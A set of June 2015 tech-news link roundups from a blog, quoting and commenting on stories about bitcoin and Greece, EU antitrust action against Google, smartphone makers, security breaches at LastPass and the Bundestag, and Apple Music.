“You have people worrying about their families’ wealth or their life savings, and worrying that their money might be locked up in banks … They’d rather hold money in a private asset like gold or bitcoin.”

Scigala said over the past two months, with Greece locked in talks with its creditors, the company had seen a 124% pick-up in inflows from Greek IP addresses – numerical labels that identify computers and other internet-enabled devices.

124% = doubling. Which doesn’t amount to much, really, unless Greece was already a lot of business. Here’s the problem with this story. To buy bitcoin, you have to sell the euros to someone. If Greeks are withdrawing their euros from banks, why not hold on to those euros instead of buying bitcoin with them? Do they really think a post-Grexit euro will be worth less, rather than more? I’d bet on the latter.

There may be some Greek euros moving into bitcoin, which is moving bitcoin – but that only indicates that bitcoin has low liquidity, and so small amounts of money can move the value easily. Or else it’s something else altogether causing it.

Critics due to get EU’s Google antitrust charge sheet this week: sources » Reuters

Foo Yun Chee:

Microsoft, German publisher Axel Springer and 17 other critics of Google are expected to get a copy of the EU’s antitrust charge sheet against the search engine giant this week in order to allow them to provide feedback, four people familiar with the matter said on Tuesday.

The 19 companies, which include U.S. online travel site Expedia, U.S. consumer reviews website Yelp, online mapping service Hot-map and British price comparison site Foundem, helped triggered the European Commission’s case against Google nearly five years ago…

…Google has until July 7 to respond to the accusations. This can be extended on request. It can also seek a closed-door hearing to argue its case before a broad audience of antitrust officials and the critics.

The complainants were told on Monday to sign confidentiality waivers not to disclose the so-called statement of objections to journalists or public affairs consultants before they could get a copy of the redacted document, according to a Commission letter seen by Reuters.

The critics were told to restrict the charge sheet to their lawyers and economists.

Leaks in 3,2,1… And there’s Andrew Orlowski’s writeup of the Foundem examination into Google’s “search for harm” blogpost.

One tiny number can reveal big problems at a global smartphone maker » Bloomberg Business

Tim Culpan:

Tucked away in a corporate earnings report—past the data on profit margins and revenue growth, hidden deep inside a balance sheet—is a number that can tell you a lot about a mobile phone maker’s health. In the global smartphone war, brands are routinely measured by market share, revenue, profit, and the coolness of their ads. But one line item called finished goods inventory, which refers to the percentage of materials that were manufactured into phones but went unsold, can give insight into whether a company’s fortunes are changing.

The latest company to let phones pile up in warehouses and on store shelves is HTC. The Taiwanese company’s stock just fell to its lowest point in a decade after lowering its sales forecast on June 5 and announcing a NT$2.9 billion ($93 million) writedown, though it’s recovered some of that loss amid speculation the decline could make it a buyout target. HTC’s finished goods inventory had climbed to a record high 2.35% of total assets at the end of last quarter. During the company’s heyday, that figure rarely nudged above 1%.

Culpan has done a neat job, building on what I pointed out last week about HTC’s broader inventory numbers. Relating inventory to total assets is an effective way to look at it; here’s the graph.

HTC inventory as percent of assets
So now it’s higher than ever before. Finished goods inventory is going to be one of the first numbers people look at when the Q2 figures are published (in late July, probably).

Merkel’s PC was the first one infected in the Bundestag hack »Security Affairs

I have written many posts regarding a recent attack against the German Bundestag with caused a major data breach.

We discussed the possibility that the cyber attack against the German Parliament was coordinated by Russian state-sponsored hackers that spread a highly sophisticated malware inside the network of the Bundestag.

The consequence of the data breach could be serious for the German Government, German media states that Bundestag may need to replace 20,000 computers after the intrusion, an operation that could cost millions of euros.

New revelations in the investigation confirms that the cyber attack on the German Bundestag began with the compromise of Chancellor Angela Merkel’s personal computer.

Her phone by the NSA, her computer by Russia…

Flaw lingers in Samsung phones, illustrating hacking risk » WSJ

Danny Yadron:

Last fall, researchers at cybersecurity firm NowSecure found a bug in most Samsung smartphones that could allow hackers to spy on users.

In March, Samsung told NowSecure it had sent a fix to wireless carriers that they could distribute to users. It asked NowSecure to wait three months before going public.

Last week, the researchers bought two new Samsung Galaxy S6’s from Verizon Wireless and Sprint. They found both were still vulnerable to the security hole, which involves how the phone accepts data when updating keyboard software.

NowSecure CEO Andrew Hoog shared his version of events with The Wall Street Journal as his company prepared to release its research Tuesday. The story helps illuminate why hacking is so hard to stamp out.

That’s particularly true in smartphones, with its diffuse system of device makers, software programmers and network operators. Things likely are only to get worse as Americans connect their thermostats, door locks and cars to the Internet and face the need to update their software…

…Welton found he could hijack the process of updating one of the virtual keyboards Samsung installs on many Android smartphones. From there, he could eavesdrop on phone conversations, rummage through text messages and contacts, or turn on the microphone to capture audio.

That was possible, Hoog said, because Samsung didn’t encrypt the update process.

It’s the IOT vulnerability that’s the real worry here, much more than which make of phone is involved. Except that Samsung asked NowSecure for a year to fix the bug – a month after it was told about it. And what does this mean for Google’s “we find a bug and we publicise it in 90 days” stance?

Nokia faces lengthy arbitration over LG patent royalty payments » Reuters

Jussi Rosendahl:

Nokia said the arbitration with LG is expected to conclude within two years. Shares in Nokia rose 1.4 percent by 1204 GMT (8.04 a.m ET).

“This is becoming a more and more common model. The companies won’t go to the court but instead let an independent party decide,” said Nordea analyst Sami Sarkamies.

He estimated that the Samsung deal, expected to conclude later this year, could eventually mean Nokia receives 100-200 million euros of additional royalty payments annually, on top of retroactive payments.

Seems to be related to 4G patents; Nokia signed a similar deal with Samsung a while back. For LG, means that profitability in the smartphone side becomes that little bit more elusive – especially after the back payment.

Apple News curation will have human editors and that will raise important questions » 9to5Mac

Jordan Kahn:

Techmeme‘s founder Gabe Rivera gave us the hard truth on why being an algorithm-based service like Google News doesn’t make sense for the Apple News app saying, “All news aggregators intended for the mass market need editors, so this makes sense for Apple.” But the flip side of Apple’s human-based curation is that without a separation of editorial and the business, there will undoubtedly be conflicts of interest. Rivera points out that “…as the world’s most valuable corporation, they can’t and shouldn’t be trusted to present well-rounded coverage on many important topics.” Rivera continues, “But most readers won’t care about that.”

Apple doesn’t want this to be an algorithm thing, because (a) algorithms might not pull outré-yet-fascinating stuff to the surface (b) if some story that were grisly/violent/sexual – pick the topic you think Americans in particular would react in horror to – popped up, Apple would of course get the blame. Apple hates that.

So it wants humans on hand to stop the Bad Stuff that will Offend People finding its way into the app. But that immediately raises the question: what will it define as Bad Stuff? Are Mark Gurman’s well-sourced leaks of Apple plans Bad Stuff? Is vicious criticism of Apple?

I suspect people are overplaying this; Apple is really wary of consumer backlashes over pr0n. Look at how Facebook struggles with the same topic, and the issue of content posted by millions of people which some find offensive and others really don’t.

No simple answer, but Apple may not have realised it was putting itself in the position of a publisher.

Start up: LastPass’s warning, Google tracks down racists, HTC snubs Asus, valuing maps, and more

Posted on June 16, 2015 by charlesarthur

Health risk? An LED bulb sign board. Photo by Patrick Hoesly on Flickr.

A selection of 9 links for you. Use them wisely. I’m charlesarthur on Twitter. Observations and links welcome.

Competition and Partisanship » ignore the code

Lukas Mathis:

I wish we’d see even more competition! I wish Samsung would get serious with its own OS. I wish HP would revive Web OS. I wish Blackberry would stop making bad decisions, and start kicking ass again. I wish smaller companies like Jolla, Ubuntu, and the Firefox OS team would be better able to compete with the big guys. I wish Microsoft would get more credit for the progress it has made in UI design, instead of just getting crap for changing things from how they were in Windows 95. And I wish people would look outside of the confines of their chosen platform, and acknowledge the positive contributions that other companies are making. Get out of your bubbles! Other systems are great and interesting and useful, too!

The problem with this view, happy as it is, is that there’s a cognitive load associated with learning a new OS, and the cognitive load grows geometrically the more OSs you have to work on.

LastPass Security Notice » The LastPass Blog

Joe Siegrist:

We want to notify our community that on Friday, our team discovered and blocked suspicious activity on our network. In our investigation, we have found no evidence that encrypted user vault data was taken, nor that LastPass user accounts were accessed. The investigation has shown, however, that LastPass account email addresses, password reminders, server per user salts, and authentication hashes were compromised.

We are confident that our encryption measures are sufficient to protect the vast majority of users. LastPass strengthens the authentication hash with a random salt and 100,000 rounds of server-side PBKDF2-SHA256, in addition to the rounds performed client-side.

That’s grea– hang on, “vast majority” of users?

Do lightbulbs need a health warning label? » Consumer Reports

Consumer Reports’ medical experts say that studies have shown that exposure to light at night is clearly associated with an increased risk of sleep problems as well as mood disorders. Additional research has linked light at night with an increased risk of breast cancer, obesity, type 2 diabetes, and cardiovascular disease, however, much more research remains to be done to determine just how significant that risk may be.

So, why single out LEDs? LEDs do emit more blue light than CFLs, and incandescents emit very little. And while any light can suppress melatonin, the hormone that facilitates sleep, research has shown that human eyes are especially sensitive to blue (which is also emitted in higher levels by most of today’s indispensable electronic devices).

Fred Maxik, founder and chief technology officer of Lighting Science, says that in contrast to the older incandescent bulbs, LEDs and CFLs have significantly changed the impact light has on human health, affecting our circadian rhythms. He believes the effects can be beneficial, such as promoting alertness or enabling natural sleep hormones to be released. But “there’s a growing amount of evidence that light can also have negative biological effects,” he says. And that’s why the company created the label. Maxik is also encouraging other lighting manufacturers to make consumers aware of the effects of light on health.

Lighting Science has hired former U.S. Secretary of Health and Human Services, Louis W. Sullivan, M.D., as a consultant. “The fact is that the wrong kind of light can be disruptive on sleep patterns,” he says. “I think this label gives interesting information to the public so they can decide, particularly for people with sleep problems.”

Short answer: no, unless you’re an American.

Use Google searches to figure out how racist your neighbourhood is » Gizmodo

Annalee Newitz:

What [data scientist Seth] Stephens-Davidowitz ultimately discovered was that racism “appears to have cost Obama roughly four percentage points of the national popular vote in both 2008 and 2012.” He determined this by showing that the higher the number of searches there were on “nigger” in a given area, the more likely it was that Obama lost votes there — even controlling for things like income, already-existing political affiliations, and more. In other words, even in an area where people typically voted for Democrats, you’d see a less-than-typical number of votes for Obama if the rate of Google searches on “nigger” was higher than average. As Stephens-Davidowitz put it, “An area’s racially charged search rate is a robust negative predictor of Obama’s vote share.”

Campbell’s law, Goodhart’s law, and the trouble with observation » mmitII

Matt Ballantine pointed me back to this observation of his from 2012, following the article I linked the other day about how most mobile benchmarks aren’t much use:

Charles Goodhart is an economist from the London School of Economics, and a former member of the Bank of England’s Monetary Policy Committee.

The law named after him was first noted in a paper he published in 1975, and states:

“that once a social or economic indicator or other surrogate measure is made a target for the purpose of conducting social or economic policy, then it will lose the information content that would qualify it to play that role.”

And if you use benchmarks to try to value a phone (or PC) they’ll be gamed and become worthless.

BlackBerry: an Android phone won’t move the needle » Seeking Alpha

Zenith Investments:

So what can BlackBerry bring to the table so that they can make a profit from an Android smartphone if it can’t bring security? The sources spilling the beans on BlackBerry’s potential Android phone also indicated that they plan to differentiate their phone with a physical keyboard. Again I see the argument – this should appeal to the hardcore BlackBerry fans who had to switch to Android because of the added apps. The problem is that this was tried before – with the Motorola Droid Pro. It was an Android phone that was equipped with a physical keyboard, but it suffered from very low sales. The problem seems to be that the people, who desperately want a physical keyboard, also want the BlackBerry operating system.

That’s pretty much it. Seeking Alpha is a site where you can find any opinion that suits you, but this one on the “Android BlackBerry” is at least realistic about why people buy the phones. I’m forecasting an operating loss of about $20m in the just-gone quarter.

To clarify the news on Asustek will not rule out the possibility of acquiring HTC Corp » HTC

HTC’s formal announcement to the Taiwanese stock exchange on Monday:

We didn’t contact Asusteck and will not consider the acquisition. As an international brand, HTC will continue to design world-class innovative smart devices through its pursuit of brilliance brand promise.

Let’s put a marker down on that one.

Where are Maps going? » Asymco

Horace Dediu, using Apple’s data points about map requests per week:

In December 2012 I posted an analysis on the the cost of maps. It showed that maintaining maps requires an investment of between $1 billion and $2 billion/yr. With the addition of new features such as 3-D mapping, transit maps and thousands of new cities, the cost is likely to have increased. $2 billion/yr is probably the norm today.

Apple then could be seen as spending about $6.5/user/yr on maps and Google could be spending about $2/user/yr. To be profitable Google would need to find ad revenues of $2/user/yr and Apple would need to find $6 of profit on each phone/yr. Clearly, each of these targets is achievable.

In contrast we can see why Nokia’s HERE Maps business is now worth a lot less than it was in 2007. The asset has been for sale for some time and the latest bid has been for $3 billion, making the $5 billion lost in market value and $7 billion of investment since seem like a catastrophe. Without a business model the data is worthless – with only 30 million users the cost per user reaches $66/yr. A buyer needs to find an appropriate model for sustaining a $2 billion/yr burn rate.

So the question of where maps are going depends on the business model for maps.

The point about the loss in value of HERE is well made.

Apple Music vs. Spotify: don’t repeat Bob Lefsetz’s mistake » Medium

Lefsetz, you’ll recall, was hugely dismissive of Apple Music. Michael Vakulenko thinks it is a different play altogether – a platform play in a different world of music:

Apple Music is more than a differently-packaged version of Spotify. Google AdWords is more than a less-expensive advertising agency, iOS is more than a nicer-looking version of Symbian, Uber is more than a digital version of a Taxicab stand, AirBnB is more than renting mattresses to strangers and Munchery is more than a bigger restaurant kitchen. These are platforms having very different economics from traditional products. As Marshall Van Alstyne said: “Platforms beat products every time.”

Platforms disrupt industry after industry: telecom, computing, watches, automotive, consumer electronics, banking, education, food, transportation, hospitality, healthcare, and more. When you see a new idea in the market or a new competitor, ask yourself: “Is it a market-creating platform?” and “What will it mean for my business if the platform reaches critical mass?”

Start up: Apple’s Sonos rival?, Nokia’s smartwatch, three-ton Twitter, Netscape in the NHS, and more

Posted on June 15, 2015 by charlesarthur

Sunday Times sourcing? Photo by DrJohn2005 on Flickr

A selection of 8 links for you. Why not? I’m charlesarthur on Twitter. Observations and links welcome.

Apple Music’s missing link: how Beats Electronics fumbled its Sonos killer (EXCLUSIVE) » Variety

Janko Roettgers:

Beats was looking to build a premium product that would mimic and compete with wireless speakers produced by Sonos. Like Sonos, Beats wanted to give consumers the option to place speakers in multiple rooms of their house, and then have them all play the same music synchronously. And like Sonos, Beats was looking to introduce a bigger, more powerful speaker for the living room first, and then follow up with a smaller, more affordable product for the kitchen and bedroom.

However, Beats wasn’t just looking to copy Sonos. The company was also working on combining Bluetooth with Wifi and NFC to allow for seamless handovers, effectively making it possible to launch music playback as soon as you’d enter the room, said a source familiar with technical details of the project. And thanks to its premium brand, Beats wasn’t looking to undercut Sonos — quite the contrary: Word has it the company was looking to sell its bigger Wifi speaker for as much as $750.

1) wouldn’t have been a Sonos killer
2) this is utterly random, but my next-door neighbour works in the (legal) pharma industry, and four months ago told me the story of going to a party in San Diego where “people from Apple” were talking about exactly this device. So I’m inclined to believe it, weirdly. Also, my neighbour’s reaction: “I said, so you’ve reinvented the boombox?” Probably why it was canned.

Apple’s WWDC keynote: issues with structure, approach, direction » Mobile Forward

Hristo Daniel Ushev on the messy Apple WWDC keynote:

Ultimately, the issues above are symptoms of weak (or hand-cuffed) direction. Not just in the form of what to do (e.g., don’t have Eddy Cue focus on the app) but also in terms of what not to do – i.e., editing. Editing in this context: shortening the list of presenters, directing them to use fewer slides (at one point, they flashed by like pages in a flip book), and saying no to distracting uses of humor and movement. When viewed through this lens, I think this keynote lacked a director. Or at least one that could effectively influence the senior executives and the choices they made. (Believe me, I’m not saying any of this is easy.)

Will all this impact the products’ success? Not directly. Indirectly, however, key influencers of consumers (developers, fans, and journalists) may get a fuzzier picture of Apple’s intent or advantage.

The music segment was terrible. The rest, fine.

Sunday Times Snowden story is journalism at its worst » The Intercept

Glenn Greenwald on the Sunday Times’s story – its front-page lead (aka “splash”) claiming that UK intelligence agencies “had to move” agents and that Russia and China “had cracked” the files (here’s text of the print version; try reading it first):

how could these hidden British officials possibly know that China and Russia learned things from the Snowden files as opposed to all the other hacking and spying those countries do? Moreover, as pointed out last night by my colleague Ryan Gallagher – who has worked for well over a year with the full Snowden archive – “I’ve reviewed the Snowden documents and I’ve never seen anything in there naming active MI6 agents.” He also said: “I’ve seen nothing in the region of 1m documents in the Snowden archive, so I don’t know where that number has come from.”

Greenwald is furious, and rightly so. The Sunday Times story is clearly hung on a single quote from a UK intelligence agency source, but one which doesn’t support the story’s claims. The Snowden archive is vast, but putting a number on it is surprisingly difficult, because it has interrelated files – there’s an almost wiki-like quality to some parts.

Given that the UK (and US) intelligence agencies don’t claim to know what’s in the Snowden files, they can’t know what the Russians or Chinese know from it – if for the sake of credulity we believe that the Russians and Chinese have cracked the encryption, which I seriously doubt.

When I used to work Sunday shifts as a news reporter at The Independent, I often had to “follow up” stories that appeared in the Sunday Times. The problem was, as soon as you began trying to establish the facts they claimed, the stories fell apart – the claims didn’t match reality. This is another example, although that hasn’t stopped the BBC repeating it (though an analysis by Gordon Corera in the middle of this straight-up followup rather backs away from the Sunday Times claims).

Microsoft Moonraker was Nokia’s smartwatch before it was killed » The Verge

Tom Warren:

Nokia’s Moonraker smartwatch never made it to market primarily because Microsoft was anticipating its wearable Band. While the Moonraker had a number of sensors to allow you to lift your arm to read texts or drop it to turn off the display, Microsoft opted for the Band as it had more functionality. Nokia took the familiar “Metro” interface from Windows Phone and paired it with simple email, phone, and messaging apps on its smartwatch. There was even a camera remote feature to take pictures on a smartphone from the watch. Facebook and MixRadio integration was also built-in, alongside customizable watch faces and different colored straps.

It’s unlikely that the “Moonraker” will ever make it to the market, but given time Microsoft may want to bring some of the more fashion-related aspects of it over to the Band in the future. Microsoft is now working on the second generation of its Band. While the software platform on the upcoming Microsoft Band 2 will remain largely the same, the look and feel of the device will improve. Microsoft is expected to launch its next-generation Band later this year after Windows 10 is available broadly.

The UI looks unfinished in the photos. And would it have worked only with Windows Phone? If so, it was dead already.

The Twitter of the three-ton nail » Medium

Zeynep Tufekci on Twitter’s “metric-driven” approach to please Wall Street:

if you set up an absurd game, as Wall Street often does, ruled by the incentives of those who set the rules (their quarterly bonus calculations depend on chasing growth for the sake of growth), people will, naturally, game the system and produce the results you want, just as absurdly.

At the moment, sadly, Wall Street is not solely a representative of market dynamics, but also a collective madness imposed upon us by the distorted over-accumulation of capital in the hands of too-few people. This “elite failure” has repercussions beyond my beloved platform: from global warming to revving up global growth (you can’t grow demand if people don’t make money) but in a sustainable manner (because the annual bonus is not the right time-frame). We are paying the price for having surrendered our economy to a game that is not about some independent logic of the market, but the absurdity of accumulating more zeroes in a bank account (which you cannot spend in any reasonable lifetime).

If you’re not following @zeynep, you should. She’s so incisive.

Misunderstood or inappropriate mobile benchmarks are hurting the industry and consumers » Forbes

Patrick Moorhead:

Because of the creation, use and promotion of these inaccurate, misunderstood, and/or gameable benchmarks, we are seeing smartphone manufacturers and SoC vendors dedicating time and engineering resources to ensuring that their performance in these benchmarks is up to expectations. After all, if so many people are using or mischaracterizing AnTuTu and Geekbench, it lends them credibility even when it shouldn’t.

Or vendors are adding features that make the misrepresentative benchmarks look better, like by adding more CPU cores beyond what any piece of software can use to improve the experience outside of battery life.

Additionally, because so many reputable tech blogs don’t run ANY benchmarks at all, they are essentially giving the ones that do more credibility when they show AnTuTu and other benchmarks.

I trust Anandtech (as does Moorhead), but most other benchmarks strike me as crap because they tell you nothing about experience. Google’s Project Butter (smoother scrolling) and Project Volta (longer battery life) and focus, in Android M, on standby life tells us that benchmarks tell you barely anything about real-life use.

Exclusive: BlackBerry may put Android system on new device: sources » Reuters

Euan Rocha:

BlackBerry is considering equipping an upcoming smartphone with Google’s Android software for the first time, an acknowledgement that its revamped line of devices has failed to win mass appeal, according to four sources familiar with the matter.

The move would be an about-face for the Waterloo, Ontario-based company, which had shunned Android in a bet that its BlackBerry 10 line of phones would be able to claw back market share lost to Apple’s iPhone and a slew of devices powered by Android.

The sources, who asked not to be named as they have not been authorized to discuss the matter publicly, said the move to use Android is part of BlackBerry’s strategy to pivot to focus on software and device management. BlackBerry, which once dominated smartphone sales, now has a market share of less than 1%.

Rocha is based in Toronto. I’d trust his sources. Can’t see why BlackBerry thinks this is a good idea though. It’s losing money on handsets; this would be a way to get commoditised out of the solar system, and lose its faithful buyers too.

NHS browser statistics » LinkedIn

Mark Reynolds:

Have you wondered what technology the NHS uses? We gather anonymous statistics on those using NHSmail and so have a good picture of technology across healthcare in England and Scotland.

88% of users access the service via Windows, with 8% on Macs and 3% on Linux. Amazingly we have a user browsing NHSmail using their Wii, which suggests dedication to the cause or spoofing the browser data. 65% of users are on Windows 7, followed by XP (20%) and Vista (3%). Windows 8 usage is too low to register.

Microsoft Internet Explorer dominates browser statistics at 73%, followed by Chrome (13%), Safari (7%), Mozilla (5%) and Firefox (2%). 0.9% of traffic comes from Netscape! Internet Explorer 7 and 8 account for 61% of the traffic, with IE 11 too low to register.

Two things: Netscape > Windows 8. Also: XP > Vista + Windows 8. That’s inertia.

Worth comparing with data.gov.uk stats for web browsing.

Start up: Oculus here!, when cashless fails, what Twitter needs now, EC’s ebook probe, and more

Posted on June 12, 2015 by charlesarthur

Musical toast? Photo by revedavion.com on Flickr.

A selection of 9 links for you. Use them wisely. I’m charlesarthur on Twitter. Observations and links welcome.

April 2015: Twitter needs new leadership » Stratechery

Ben Thompson nailed it months ago:

I believe it’s time for Twitter’s leadership, in particular CEO Dick Costolo, to make way for new leadership that has improved credibility with Wall Street, with developers, and within Twitter itself…

…Twitter would be better off retooling their API and developer agreements to ensure they are learning from every application they interact with, and in return sharing their graph along with advertising in the form of their MoPub or Namo Media-derived offerings. The advantage of this approach is that the imagination and ingenuity of a massive developer ecosystem will always be far faster and more innovative than anything any one company can do on its own — just ask Apple.

Worth reading (or re-reading). The accompanying podcast nails it too.

Apple Music » Lefsetz Letter

Bob Lefsetz has a typically nuanced take on Apple’s new offering:

It’s toast.

Its success was based upon eliminating free. But that positively non-techie entity known as the government put the kibosh on that. Now the labels and Apple are too scared to enact their plan of eliminating freemium. So while the techies leap ahead, creating solutions to problems we didn’t even know we had, those in the music business stay mired in the past, believing backroom dealings and brawn will get them what they want.

But it won’t in the new world.

What I find puzzling is that nobody at the record labels has heard of the Laffer curve.

Oculus teams up with Microsoft on Rift VR headset » FT.com

Tim Bradshaw:

Oculus faces mounting competition from Sony PlayStation’s Project Morpheus and games software maker Valve’s Vive headset, made by HTC. Google is also investing heavily in VR, after unveiling updates to its low-cost Cardboard headset last month, including its Jump 360-degree video system.

Oculus emphasised its headset’s ease of use and a familiar video-gaming content for its launch.

“It rests comfortably right on your brow,” Mr Iribe said of the Rift. “You’re going to put it on like a baseball cap. It’s going to be simple and easy . . . The goal is you put it on and it goes away, it disappears.”

Download Festival-goers left hungry as cashless system goes to Borksville » The Inquirer

Chris Merriman:

Festivalgoers are ready to throw a Five Finger Death Punch at organisers after a cashless society model involving digital currency failed.

The Download Festival at Castle Donington is completely cashless this year, and visitors are being issued with a dog-tag At the Gates.

However, the system for topping up the dog-tags with currency has failed, and there’s no back up, leaving many people complaining of being unable to eat or drink.

This is a huge embarrassment for cashless as the future of money in the week that Apple Pay was announced for the UK market.

Download proudly hailed itself as the first major festival to use RFID technology to replace cash, but the Utopian dream seems to have turned into a nightmare as festival goers are not only unable to eat, but face the prospect of seeing Slipknot sober.

Test, and then test. Then test it again. Then pull out something essential. Test.

Who’s afraid of DNS? Nominet’s ‘turing’ tool visualises hidden security threats » Techworld

John Dunn:

UK domain registry Nominet has shown off a striking new visualisation tool called ‘turing’ that large organisations can use to peer into their DNS traffic to trace latency issues and spot previously invisible botnets and malware.

In development for four years, and used internally by Nominet for the last two, at core turing is about representing DNS traffic in visual form, allowing administrators to ‘see’ patterns in real time that would normally be impossible to detect let alone understand.

EU opens investigation into Amazon’s e-book selling » Reuters

Julia Fioretti:

The investigation adds to the pressure on the online retailer in Europe, where it is already being investigated for the low tax rates it pays in Luxembourg.

The Commission said it would look in particular into certain clauses included in Amazon’s contracts with publishers.

These clauses, it said, required publishers to inform Amazon about more favorable or alternative terms offered to Amazon’s competitors, a means to ensure Amazon is offered terms at least as good as those of its competitors…

…”Amazon has developed a successful business that offers consumers a comprehensive service, including for e-books,” Competition Commissioner Margrethe Vestager said in a statement.

“Our investigation does not call that into question. However, it is my duty to make sure that Amazon’s arrangements with publishers are not harmful to consumers, by preventing other e-book distributors from innovating and competing effectively with Amazon.”

Similar in that sense to Apple’s bad action in the “most favoured nation” clause for ebooks it sought from publishers.

Google’s Android One may go down as an interesting idea that bombed » ETtech

Gulveen Aulakh:

Google’s first set of phone-making partners Micromax, Karbonn and Spice have no development roadmap for the platform’s next batch of devices. Some are clearing available stock at discounts, executives told ET. Intex, Lava and Xolo, which were to join the above three, no longer seem to be keen, leading some to question whether the search giant is planning to drop the Android One project altogether.

Google insisted it’s still committed to the product. “We’re not backing away from the programme,” Caesar Sengupta, vice president of product management at Google, told ET. “We’ve learnt a lot from the initial round with our partners and they have learnt in terms of device availability, in channel and others. Over time, as we work with our partners, we will keep working on making sure that we do things much better.” But with the products not doing too well, executives at the three partners said they weren’t working on the next lot of Android One devices.

The problem with Android One being that it tried to force a uniform experience – which left the OEMs no way to differentiate. Who benefits? Only Google.

jansoucek/iOS-Mail.app-inject-kit » GitHub

Jan Soucek:

Back in January 2015 I stumbled upon a bug in iOS’s mail client, resulting in HTML tag in e-mail messages not being ignored. This bug allows remote HTML content to be loaded, replacing the content of the original e-mail message. JavaScript is disabled in this UIWebView, but it is still possible to build a functional password “collector” using simple HTML and CSS.

It was filed under Radar #19479280 back in January 2015, but the fix was not delivered in any of the iOS updates following 8.1.2. Therefore I decided to publish the proof of concept code here.

Here’s the Youtube video:

It uses a targeted email to capture the person’s iCloud password (if their iCloud email is the same email). The prime weakness is the way iOS 8 keeps popping up dialogs asking you to sign into the App Store. Secondary weakness may be loading images in Mail; I don’t know whether turning off “load images” guards against this.

Bad that it has taken Apple six months not to do anything for a potential targeted phishing attack.

The mobile to machine learning era: privacy in the new age. » Praxtime

Nathan Taylor on Apple, privacy and machine learning:

there’s a risk that inside the company Apple could cripple their machine learning efforts by overcommitting to their own marketing and privacy ideology. I noticed Apple’s Phil Schiller was on message last night about privacy on John Gruber’s The Talk Show. It’s hard to be certain of Apple’s motivation here. It’s likely some mix of being out of touch with recent trends so being overly creeped out by machine learning, spinning their backwardness in cloud and machine learning in the best light, having some real and serious moral concerns about privacy, plus some very cynical distancing from Google. The latter since they know Google will be the one to bear the brunt of the lawsuits and tech regulations around privacy as machine learning explodes. And then Apple can follow serenely behind in their wake…

…What I noticed and liked about the Apple keynote at WWDC this week is Craig Federighi clearly loved all the new cool features based on machine learning and searching with natural language. He has an infectious enthusiasm. It’s great to see. Apple clearly takes machine learning very seriously. They just want to do it their own quirky and backhanded way.

The point about lawsuits and regulation is one I hadn’t seen raised before. But once it’s said, it feels inevitable.

Windows Phone, in five tweets

Posted on June 11, 2015 by charlesarthur

Data from ComScore of US installed base of smartphones

Windows Mobile growth has stalled in the U.S. The platform seems to have no foreseeable potential

— Horace Dediu (@asymco) June 9, 2015

@benthompson @asymco Amazed when a coworker who always had a win phone and just got a new one last year changed to an iPhone 2 months ago.

— Scanner (@Matsubue) June 9, 2015

@Matsubue @benthompson Was a reason apparent?

— Horace Dediu (@asymco) June 9, 2015

@asymco @benthompson Tired of lack of apps and support. Basically he said windows phone was dead in terms of getting the job he wanted done.

— Scanner (@Matsubue) June 9, 2015

@asymco @benthompson He was at an event and an app he wanted to use was not available and it was the straw that broke the camel’s back.

— Scanner (@Matsubue) June 9, 2015

Don’t expect this situation to change.